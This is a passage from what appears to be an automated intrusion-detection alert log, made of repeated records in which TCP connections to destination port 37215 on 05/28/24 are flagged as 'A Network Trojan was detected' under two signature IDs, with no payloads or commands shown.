                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911689
                  SID:2835222
                  Source Port:33844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661156
                  SID:2835222
                  Source Port:44020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768649
                  SID:2835222
                  Source Port:40518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278084
                  SID:2829579
                  Source Port:59892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719981
                  SID:2829579
                  Source Port:33038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488555
                  SID:2835222
                  Source Port:60392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767618
                  SID:2829579
                  Source Port:47054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790973
                  SID:2835222
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843706
                  SID:2835222
                  Source Port:35620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918151
                  SID:2835222
                  Source Port:54744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494810
                  SID:2829579
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661774
                  SID:2835222
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546556
                  SID:2835222
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586445
                  SID:2829579
                  Source Port:35334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294541
                  SID:2835222
                  Source Port:48442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696042
                  SID:2835222
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300247
                  SID:2835222
                  Source Port:33708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536177
                  SID:2829579
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537209
                  SID:2829579
                  Source Port:57652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490308
                  SID:2835222
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802022
                  SID:2835222
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.297591
                  SID:2835222
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591073
                  SID:2829579
                  Source Port:45732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494713
                  SID:2835222
                  Source Port:35462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594369
                  SID:2835222
                  Source Port:33094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700242
                  SID:2829579
                  Source Port:50050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.873546
                  SID:2835222
                  Source Port:54834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551824
                  SID:2829579
                  Source Port:42012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276767
                  SID:2835222
                  Source Port:44850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887630
                  SID:2835222
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804083
                  SID:2835222
                  Source Port:49920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881163
                  SID:2835222
                  Source Port:36838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2835222
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586379
                  SID:2829579
                  Source Port:56476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910437
                  SID:2835222
                  Source Port:37610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323176
                  SID:2829579
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656772
                  SID:2829579
                  Source Port:35088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737910
                  SID:2835222
                  Source Port:42942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864997
                  SID:2829579
                  Source Port:33502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860120
                  SID:2835222
                  Source Port:59560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2829579
                  Source Port:50510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530466
                  SID:2835222
                  Source Port:34432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788942
                  SID:2829579
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578564
                  SID:2835222
                  Source Port:33450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510642
                  SID:2829579
                  Source Port:42124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578662
                  SID:2835222
                  Source Port:48734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319402
                  SID:2829579
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695696
                  SID:2829579
                  Source Port:33774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718867
                  SID:2829579
                  Source Port:40062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719036
                  SID:2835222
                  Source Port:58270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493133
                  SID:2835222
                  Source Port:58990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846088
                  SID:2829579
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483039
                  SID:2829579
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799399
                  SID:2835222
                  Source Port:48106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323466
                  SID:2829579
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2835222
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2829579
                  Source Port:60358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628952
                  SID:2829579
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696101
                  SID:2835222
                  Source Port:43890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678805
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606826
                  SID:2829579
                  Source Port:33948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555686
                  SID:2835222
                  Source Port:37016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661548
                  SID:2835222
                  Source Port:47376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660569
                  SID:2835222
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537244
                  SID:2829579
                  Source Port:41950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584438
                  SID:2829579
                  Source Port:45998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888259
                  SID:2835222
                  Source Port:59934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886567
                  SID:2835222
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2829579
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300170
                  SID:2829579
                  Source Port:38324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315767
                  SID:2829579
                  Source Port:53292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490019
                  SID:2829579
                  Source Port:33334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927471
                  SID:2829579
                  Source Port:50740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659240
                  SID:2835222
                  Source Port:58712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729764
                  SID:2829579
                  Source Port:35392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628922
                  SID:2829579
                  Source Port:48172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910965
                  SID:2829579
                  Source Port:37884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696120
                  SID:2829579
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910975
                  SID:2835222
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2829579
                  Source Port:58382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649380
                  SID:2835222
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276866
                  SID:2835222
                  Source Port:59140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911626
                  SID:2835222
                  Source Port:41836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719895
                  SID:2829579
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488140
                  SID:2835222
                  Source Port:45716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650850
                  SID:2829579
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797347
                  SID:2835222
                  Source Port:50904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546769
                  SID:2829579
                  Source Port:34536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660613
                  SID:2835222
                  Source Port:32820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492368
                  SID:2835222
                  Source Port:54118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544972
                  SID:2835222
                  Source Port:39964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870835
                  SID:2835222
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660468
                  SID:2829579
                  Source Port:40612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931591
                  SID:2829579
                  Source Port:50396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780796
                  SID:2829579
                  Source Port:33060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544374
                  SID:2835222
                  Source Port:40064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550697
                  SID:2835222
                  Source Port:48174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870634
                  SID:2829579
                  Source Port:57092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578744
                  SID:2835222
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510265
                  SID:2829579
                  Source Port:48936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536246
                  SID:2829579
                  Source Port:58820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544237
                  SID:2835222
                  Source Port:41748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.598812
                  SID:2829579
                  Source Port:40598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294722
                  SID:2829579
                  Source Port:52488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.865651
                  SID:2835222
                  Source Port:51384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536551
                  SID:2835222
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587905
                  SID:2835222
                  Source Port:41496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.921651
                  SID:2835222
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803742
                  SID:2835222
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650326
                  SID:2829579
                  Source Port:48412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922780
                  SID:2829579
                  Source Port:45236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316018
                  SID:2835222
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319878
                  SID:2829579
                  Source Port:43426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2835222
                  Source Port:33262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908531
                  SID:2835222
                  Source Port:47108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283784
                  SID:2835222
                  Source Port:52126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843665
                  SID:2829579
                  Source Port:41874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493512
                  SID:2835222
                  Source Port:53754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794705
                  SID:2835222
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799366
                  SID:2835222
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664595
                  SID:2829579
                  Source Port:47558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546490
                  SID:2829579
                  Source Port:59766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849072
                  SID:2829579
                  Source Port:42090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276499
                  SID:2835222
                  Source Port:52254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766338
                  SID:2835222
                  Source Port:49784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588088
                  SID:2829579
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576812
                  SID:2835222
                  Source Port:54660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912541
                  SID:2835222
                  Source Port:37360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664483
                  SID:2835222
                  Source Port:33282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942729
                  SID:2835222
                  Source Port:50908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2835222
                  Source Port:43572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908973
                  SID:2835222
                  Source Port:47184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651414
                  SID:2835222
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673844
                  SID:2829579
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276206
                  SID:2829579
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809954
                  SID:2835222
                  Source Port:44842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868575
                  SID:2835222
                  Source Port:40348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604412
                  SID:2829579
                  Source Port:55292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795154
                  SID:2829579
                  Source Port:35230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810323
                  SID:2835222
                  Source Port:43590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611036
                  SID:2829579
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.884886
                  SID:2835222
                  Source Port:44366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793509
                  SID:2829579
                  Source Port:33468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857782
                  SID:2835222
                  Source Port:40454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795037
                  SID:2829579
                  Source Port:51168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2829579
                  Source Port:48718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847431
                  SID:2829579
                  Source Port:55606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656530
                  SID:2829579
                  Source Port:55892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843786
                  SID:2835222
                  Source Port:44948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312579
                  SID:2829579
                  Source Port:50072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529101
                  SID:2829579
                  Source Port:37792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530984
                  SID:2835222
                  Source Port:36168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628152
                  SID:2835222
                  Source Port:56252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283850
                  SID:2829579
                  Source Port:39912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547492
                  SID:2829579
                  Source Port:41986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701058
                  SID:2835222
                  Source Port:55820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806139
                  SID:2835222
                  Source Port:57952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545121
                  SID:2835222
                  Source Port:58082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719152
                  SID:2829579
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749958
                  SID:2835222
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315635
                  SID:2835222
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595369
                  SID:2829579
                  Source Port:58598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578455
                  SID:2829579
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811563
                  SID:2829579
                  Source Port:57292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802004
                  SID:2835222
                  Source Port:53748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555388
                  SID:2829579
                  Source Port:54014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719837
                  SID:2829579
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.387564
                  SID:2835222
                  Source Port:52896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278727
                  SID:2829579
                  Source Port:39568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276793
                  SID:2835222
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523583
                  SID:2835222
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846719
                  SID:2835222
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316234
                  SID:2829579
                  Source Port:47678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794646
                  SID:2835222
                  Source Port:43288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583541
                  SID:2829579
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788291
                  SID:2835222
                  Source Port:52022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318672
                  SID:2835222
                  Source Port:48348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886757
                  SID:2835222
                  Source Port:42902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492205
                  SID:2829579
                  Source Port:47126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769375
                  SID:2829579
                  Source Port:41680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803880
                  SID:2835222
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661739
                  SID:2835222
                  Source Port:38824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585219
                  SID:2835222
                  Source Port:47878
